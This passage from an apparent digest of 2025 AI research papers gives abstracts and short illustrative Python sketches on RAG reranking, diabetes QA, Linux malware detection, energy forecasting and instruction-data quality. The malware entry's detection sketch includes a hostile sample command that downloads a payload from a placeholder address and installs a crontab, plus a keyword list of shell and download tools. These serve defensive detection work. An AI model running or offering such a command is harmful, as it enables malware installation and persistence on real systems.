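A sketch of the sequenced-retrieval idea: the three knowledge stores are searched in priority order (QA pairs, then terminology, then schema), priority is folded into the score, and the pooled candidates are reranked before recall. The token-overlap scorer and the weights are placeholders for whatever retriever and reranker the paper actually uses.

```python
def overlap(query: str, doc: str) -> float:
    """Toy relevance score: shared-token count (stand-in for a real retriever)."""
    return len(set(query.split()) & set(doc.split()))

def sequenced_retrieve(query: str, stores: list[tuple[float, list[str]]], k: int = 3):
    """stores: (priority_weight, documents) in priority order:
    QA pairs > terminology > database schema."""
    scored = [(w * overlap(query, d), d) for w, docs in stores for d in docs]
    scored.sort(key=lambda pair: pair[0], reverse=True)   # rerank pooled hits
    return [d for _, d in scored[:k]]

stores = [
    (3.0, ["Q: total hammer price by year? A: SELECT year, SUM(price) ..."]),
    (2.0, ["'hammer price' means the winning bid before buyer's premium"]),
    (1.0, ["table auctions(id, lot, year, hammer_price, house)"]),
]
print(sequenced_retrieve("total hammer price by year", stores))
```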
16. A Large Model Enhancement Method Based on a Hybrid Retrieval Reranking Strategy (Cited by 1)
Authors: ZHANG Jian, TANG Jintao, WANG Ting, LI Shasha. Journal of Chinese Information Processing (PKU Core), 2025(4): 42-54.
Retrieval-augmented generation helps large language models answer questions more accurately by supplying external knowledge. Existing studies show that large language models are sensitive to the position of knowledge within the input, which motivates studying how reranking strategies affect model performance as input windows grow longer. Through experiments with a purpose-built retrieval-augmented generation system, this paper verifies that storing knowledge as paragraphs, rather than as fixed-length chunks, improves model accuracy. It also finds that when retrieved knowledge is placed before the question in the input, reverse-order reranking improves accuracy further, and the effect becomes more pronounced as the amount of retrieved knowledge increases. Building on these findings, the paper proposes a reverse-order reranking method based on hybrid retrieval. Experiments show that this method improves large language model accuracy by up to 2.5% over conventional reverse-order reranking with semantic-similarity retrieval, and by up to 3.2% over forward-order reranking.
Keywords: retrieval-augmented generation; large language model; reranking method
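The finding is positional: with knowledge placed before the question, ordering passages so the most relevant one sits closest to the question (reverse order) helps. A minimal sketch of that prompt assembly, with placeholder scores:

```python
def reverse_order_prompt(question: str, passages: list[str], scores: list[float]) -> str:
    """Put retrieved passages before the question, least relevant first,
    so the most relevant passage ends up adjacent to the question."""
    order = sorted(range(len(passages)), key=lambda i: scores[i])  # ascending
    context = "\n\n".join(passages[i] for i in order)
    return f"{context}\n\nQuestion: {question}\nAnswer:"

passages = ["Background paragraph A.", "Highly relevant paragraph B."]
print(reverse_order_prompt("What does B imply?", passages, scores=[0.2, 0.9]))
```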
17. DiaRAG: An Intelligent Question-Answering System for the Diabetes Domain
Authors: YANG Tao, OUYANG Chunping, YU Ying, WAN Yaping. Chinese Journal of Engineering (PKU Core), 2025(9): 1885-1895.
To meet the dual demands for efficiency and professional accuracy in diabetes-domain question answering, this paper designs and implements DiaRAG, an intelligent question-answering system for the diabetes domain that integrates a knowledge graph with retrieval-augmented generation (RAG). The system introduces an Autoprompt Generation (APG) method that automatically produces diabetes-specific prompt templates, which are used to extract a diabetes knowledge graph and build a retrieval knowledge base. Patient questions are corrected through prompt learning, effectively resolving semantic and grammatical errors in complex queries. In addition, a fine-tuned reranker performs second-pass filtering over community summaries of the diabetes knowledge graph, ensuring that retrieval results closely match the patient's intent. By deeply integrating the knowledge graph with a large language model (LLM) and fully exploiting the external knowledge base, DiaRAG significantly improves question answering over diabetes-domain knowledge. Experimental results show that DiaRAG significantly outperforms existing systems in answer accuracy and community-summary relevance, offering an innovative solution for personalized diabetes knowledge services.
Keywords: diabetes; intelligent question-answering system; knowledge graph; retrieval-augmented generation; prompt engineering; fine-tuned reranking model
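A sketch of the second-pass filtering step: community summaries retrieved from the KG are rescored by the fine-tuned reranker, and only high-scoring ones are kept. The scoring function, threshold, and cutoff below are placeholders for the trained model and its settings.

```python
from typing import Callable

def filter_summaries(question: str, summaries: list[str],
                     rerank: Callable[[str, str], float],
                     threshold: float = 0.5, k: int = 3) -> list[str]:
    """Keep the top-k community summaries whose reranker score clears threshold."""
    scored = sorted(((rerank(question, s), s) for s in summaries), reverse=True)
    return [s for score, s in scored if score >= threshold][:k]

toy_rerank = lambda q, s: 1.0 if "insulin" in s else 0.1   # stand-in scorer
summaries = ["Community: insulin resistance pathways ...",
             "Community: foot-care guidance ..."]
print(filter_summaries("How does insulin resistance develop?", summaries, toy_rerank))
```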
18. Malware of Dynamic Behavior and Attack Patterns Using ATT&CK Framework
Authors: Jong-Yih Kuo, Ping-Feng Wang, Ti-Feng Hsieh, Cheng-Hsuan Kuo. Computer Modeling in Engineering & Sciences, 2025(6): 3133-3166.
In recent years, cyber threats have escalated across diverse sectors, with cybercrime syndicates increasingly exploiting system vulnerabilities. Traditional passive defense mechanisms have proven insufficient, particularly as Linux platforms, historically overlooked in favor of Windows, have emerged as frequent targets. According to Trend Micro, there has been a substantial increase in Linux-targeted malware, with ransomware attacks on Linux surpassing those on macOS. This alarming trend underscores the need for detection strategies specifically designed for Linux environments. To address this challenge, this study proposes a comprehensive malware detection framework tailored for Linux systems, integrating dynamic behavioral analysis with the semantic reasoning capabilities of large language models (LLMs). Malware samples are executed within sandbox environments to extract behavioral features such as system calls and command-line executions. These features are then systematically mapped to the MITRE ATT&CK framework, incorporating its defined data sources, data components, and Tactics, Techniques, and Procedures (TTPs). Two mapping constructs, Conceptual Definition Mapping and TTP Technical Keyword Mapping, are developed from official MITRE documentation. These resources are used to fine-tune an LLM, enabling it to semantically interpret complex behavioral patterns and infer associated attack techniques, including those employed by previously unknown malware variants. The resulting detection pipeline effectively bridges raw behavioral data with structured threat intelligence. Experimental evaluations confirm the efficacy of the proposed system, with the fine-tuned Gemma 2B model demonstrating significantly enhanced accuracy in associating behavioral features with ATT&CK-defined techniques. This study contributes a fully integrated Linux-specific detection framework, a novel approach for transforming unstructured behavioral data into actionable intelligence, improved interpretability of malicious behavior, and a scalable training process for future applications of LLMs in cybersecurity.
Keywords: Linux malware; dynamic analysis; behavior analysis; behavioral feature; ATT&CK; sandbox; large language model; fine-tuning
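A reduced version of the TTP Technical Keyword Mapping construct: behavioral features from the sandbox (here, command lines) are matched against keyword lists keyed by ATT&CK technique IDs. The keyword lists below are an illustrative subset; the paper derives its mappings from official MITRE documentation and then fine-tunes an LLM over them.

```python
TTP_KEYWORDS = {
    "T1059.004": ["bash -c", "sh -c"],   # Command and Scripting Interpreter: Unix Shell
    "T1105":     ["wget ", "curl -o"],   # Ingress Tool Transfer
    "T1053.003": ["crontab"],            # Scheduled Task/Job: Cron
}

def map_to_techniques(command_line: str) -> list[str]:
    """Return ATT&CK technique IDs whose keywords appear in a command line."""
    return [ttp for ttp, kws in TTP_KEYWORDS.items()
            if any(kw in command_line for kw in kws)]

sample = "bash -c 'curl -o /tmp/payload http://198.51.100.7/p && crontab /tmp/cron'"
print(map_to_techniques(sample))   # ['T1059.004', 'T1105', 'T1053.003']
```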
19. Decision-focused fine-tuning of time series foundation models for dispatchable feeder optimization
Authors: Maximilian Beichter, Nils Friederich, Janik Pinter, Dorina Werling, Kaleb Phipps, Sebastian Beichter, Oliver Neumann, Ralf Mikut, Veit Hagenmeyer, Benedikt Heidrich. Energy and AI, 2025(3): 466-479.
Time series foundation models provide a universal solution for generating forecasts to support optimization problems in energy systems. Such foundation models are typically trained in a prediction-focused manner to maximize forecast quality. In contrast, decision-focused learning directly improves the resulting value of the forecast in downstream optimization rather than merely maximizing forecasting quality. The practical integration of forecast values into forecasting models is challenging, particularly in complex applications with diverse instances, such as buildings. This becomes even more complicated when instances possess specific characteristics that require instance-specific, tailored predictions to increase the forecast value. To tackle this challenge, we use decision-focused fine-tuning within time series foundation models to offer a scalable and efficient solution for decision-focused learning applied to the dispatchable feeder optimization problem. To obtain more robust predictions for scarce building data, we use Moirai as a state-of-the-art foundation model, which offers robust and generalized results with few-shot parameter-efficient fine-tuning. Comparing the decision-focused fine-tuned Moirai with a state-of-the-art, classically prediction-focused fine-tuned Moirai, we observe an improvement of 9.45% in Average Daily Total Costs.
Keywords: deep learning; decision-focused learning; optimization; dispatchable feeder optimization; time series foundation models; parameter-efficient fine-tuning
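Decision-focused fine-tuning means backpropagating the downstream dispatch cost instead of a forecast error. The toy PyTorch loss below uses an asymmetric procurement cost as a stand-in for the dispatchable-feeder objective; the prices, tensor shapes, and linear forecaster are all illustrative, not the paper's setup.

```python
import torch
import torch.nn as nn

def dispatch_cost(forecast, demand, buy_price=1.0, shortfall_penalty=5.0):
    """Cost of committing energy equal to the forecast: pay buy_price per unit
    committed, plus a penalty on any shortfall against realized demand."""
    shortfall = torch.relu(demand - forecast)
    return (buy_price * forecast + shortfall_penalty * shortfall).mean()

model = nn.Linear(24, 24)               # toy forecaster: past 24 h -> next 24 h
x = torch.randn(32, 24)
demand = torch.rand(32, 24) * 5.0

loss = dispatch_cost(model(x), demand)  # decision-focused loss, not MSE
loss.backward()
print(float(loss))
```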
20. A Survey on Quality Evaluation of Instruction Fine-tuning Datasets for Large Language Models
Authors: Yitian Luo, Yu Liu, Lu Zhang, Feng Gao, Jinguang Gu. Data Intelligence, 2025(3): 527-566.
Instruction fine-tuning is a key method for adapting large language models (LLMs) to domain-specific tasks, and instruction quality significantly impacts model performance after fine-tuning. Hence, evaluating the quality of instructions and selecting high-quality ones are essential steps in LLM instruction fine-tuning. Although existing studies provide important theoretical foundations and techniques for this, there is still room for improvement in generality, in the relationships between methods, and in experimental verification. Current methods for evaluating instruction quality can be classified into four main categories: human evaluation, statistics-based evaluation, model-based evaluation, and LLMs-based evaluation. Among these, human evaluation relies on the subjective judgment and domain expertise of the evaluators, which offers interpretability and suits scenarios involving small-scale data and sufficient budgets. Statistics-based evaluation estimates the quality of instructions using indicators such as stopwords and lexical diversity, providing high efficiency and a suitable evaluation for large-scale data. Model-based evaluation employs specific models to quantify indicators such as perplexity (PPL) and instruction-following difficulty (IFD); it is flexible and suitable for specific tasks. LLMs-based evaluation rates the quality of instructions through prompt-based interaction with LLMs, focusing on aspects such as accuracy and coherence; it is highly automated and customizable, simplifying the evaluation process. Finally, considering the limitations of current quality evaluation methods, some future research directions are proposed for improvement. These include refining instruction categories, extending evaluation indicators, enhancing human-AI interaction evaluation methods, applying agents in instruction quality evaluation, and developing a comprehensive evaluation framework.
Keywords: large language models; instruction fine-tuning datasets; quality evaluation; human evaluation; statistics-based evaluation; model-based evaluation; LLMs-based evaluation
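One of the model-based indicators covered by the survey, instruction-following difficulty (IFD), can be sketched as the ratio of the answer's conditional loss (given the instruction) to its unconditional loss; a low value means the instruction makes the answer much easier to predict. The implementation below uses GPT-2 purely for illustration and ignores tokenizer boundary effects at the prefix/answer seam.

```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

tok = AutoTokenizer.from_pretrained("gpt2")
model = AutoModelForCausalLM.from_pretrained("gpt2").eval()

@torch.no_grad()
def answer_loss(answer: str, prefix: str = "") -> float:
    """Mean cross-entropy over answer tokens, optionally conditioned on prefix."""
    ids = tok(prefix + answer, return_tensors="pt").input_ids
    labels = ids.clone()
    labels[:, : len(tok(prefix).input_ids)] = -100   # do not score prefix tokens
    return model(ids, labels=labels).loss.item()

def ifd(instruction: str, answer: str) -> float:
    return answer_loss(answer, prefix=instruction + "\n") / answer_loss(answer)

print(ifd("Translate to French: good morning.", "bonjour, tout le monde"))
```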